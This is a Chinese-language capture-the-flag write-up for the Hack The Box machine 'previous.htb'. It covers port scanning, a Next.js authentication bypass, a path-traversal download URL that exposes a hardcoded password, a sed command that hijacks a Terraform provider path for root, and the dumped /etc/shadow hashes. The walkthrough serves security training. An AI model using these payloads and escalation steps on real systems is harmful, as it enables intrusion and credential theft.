基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sC -sV -Pn 10.10.11.83
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-30 12:57 JST
Nmap scan report for 10.10.11.83
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://previous.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.08 seconds

80

需要加hosts:

1
10.10.11.83 previous.htb

PreviousJS官网,看header用的是nextjs:

docs

存在docs,但需要认证才能查看:

CVE-2025-29927

搜索可以找到next js认证绕过相关漏洞:

docs

绕过认证可以查看docs:

直接burp设置下自动添加header方便查看:

download

examples里找到一个下载接口:

基础LFI:

next-auth

默认路径读取next-auth相关文件,得到jeremy用户密码:

1
2
3
http://previous.htb/api/download?example=../../../../proc/self/cwd/.next/server/pages/api/auth/%5B...nextauth%5D.js

e?.username==="jeremy"&&e.password===(process.env.ADMIN_SECRET??"MyNameIsJeremyAndILovePancakes"

user flag

得到的用户名密码ssh登录:

提权信息

sudo在指定目录运行terraform apply,查看配置文件知道provider文件:

所以我们可以替换配置文件中路径,从而执行我们自己的程序

提权 & root flag

准备一个恶意程序,修改配置文件,运行:

1
sed -i 's/\/usr\/local\/go\/bin/\/tmp\/miao/' /home/jeremy/.terraformrc

shadow

1
2
root:$y$j9T$8eJygIdCzBjq.MydZo1XO0$2l7w4GXSdYpIEuvzgPad7Tm2YK6/7L.mTU.CiLfaPf8:20321:0:99999:7:::
jeremy:$y$j9T$.12cctgaWMDR8r3JYiB5q0$xAiP7hRx8A8br/fd2HPW8Ctu8XumwSCAsH4v9XUxdb4:20321:0:99999:7:::

参考资料